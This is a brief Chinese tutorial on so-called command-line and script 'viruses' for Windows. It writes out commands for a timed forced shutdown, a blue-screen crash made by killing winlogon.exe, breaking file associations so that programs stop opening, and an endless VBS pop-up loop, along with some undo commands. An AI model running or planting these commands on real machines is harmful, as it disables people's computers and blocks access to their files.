经典命令行/脚本病毒

一般简单的病毒都是通过bat对Windows命令或者shell script对Linux命令来实现的。

简单的病毒从Windows开始

关机病毒

"-s"正常关机
"-f"强制关机
"-r"重启
"-t"定时关机
“-c” 设置提示信息
“-a” 是取消定时关机

比如

shutdown -s -t 600

这个命令可以实现在十分钟内电脑即将关机.

想要取消可以使用

shutdown -a

蓝屏炸弹

winlogon.exe是windows登录管理器，位于C:\Windows\System32目录下，主要用于管理用户的登录和退出，处理用户登录和注销任务。

ntsd -c q -pn

这个命令用于结束进程,如果不加后面的n,就是要输入进程的pid

例如

nstd -c q -pn winlogon.exe

这个命令会导致系统蓝屏,重启.

文件失效病毒

assoc，显示或修改文件扩展名关联。如果在没有参数的情况下使用，则 assoc 将显示所有当前文件扩展名关联的列表。

例如:

assoc.exe=txtfile

就是将exe文件和txt文件关联.
造成不良后果之后可用

assoc.exe=exefile

还原

但是利用如同

assoc.exe=txtfile
assoc.rm=txtfile
assoc.htm=txtfile
.......

如果将所有的文件都和txt关联,就会导致所有的文件都打不开,尤其当和cmd关联的时候,就无法运行.

死循环弹窗

不再使用bat,而是使用vbs脚本
MsgBox是Visual Basic和VBS中的一个函数，功能是弹出一个对话框，等待用户单击按钮，并返回一个Integer值表示用户单击了哪一个按钮。
例如

do
msgbox "hello"
loop

就会陷入死循环,只有结束进程才有用.